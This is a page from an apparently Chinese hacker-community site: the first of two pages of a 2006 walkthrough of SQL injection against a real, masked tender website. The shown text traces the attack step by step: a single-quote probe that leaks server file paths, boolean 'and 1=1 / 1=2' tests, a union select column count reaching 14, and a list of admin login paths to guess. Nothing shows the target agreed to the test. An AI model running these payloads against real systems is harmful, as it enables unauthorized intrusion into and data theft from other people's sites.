| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文 用户登录 新用户注册
记一次安全检测         ★★★ 【字体:
记一次安全检测
作者:未知 文章来源:华盟收集 点击数: 更新时间:2006-7-31
测试站点如下

http://www.******.com

找个踩点

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

提交一个 '

返回结果

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

路径出来了,继续安检.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #

返回错误,不是字符型.

注明:%23是#

提交 and 1=1 返回正常

提交 and 1=2 返回不正常

接下来就是 union 语句

and 1=1 union select 1 返回不正常

and 1=1 union select 1,2 返回不正常

and 1=1 union select 1,2,3 返回不正常

and 1=1 union select 1,2,3,4 返回不正常

and 1=1 union select 1,2,3,4,5 返回不正常

and 1=1 union select 1,2,3,4,5,6 返回不正常

and 1=1 union select 1,2,3,4,5,6,7 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常

猜到 14 就正常了 继续下一步.

一般这样的站点基本上后台是不可能那么容易让我们找到的..

还是先看看有没有再说吧..

猜猜常用的路径.

login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php

等等.有耐心的可以慢慢去猜.就算猜到了也没什么用.

[1] [2] 下一页

责任编辑:华夏编辑6  联系方式  Email:华夏编辑6
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    如何安全检测传奇私服
    一次非常规安全检测
    如何检测VMware系统
    全方位检测基于JSP网站
    检测ASP.net开发网站
    如何安全检测传奇私服
    检测某快递公司服务器
    对娱乐分站服务器检测
    论Flash动态站的安全性
    计算机安全 恶意攻击的防范招式
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号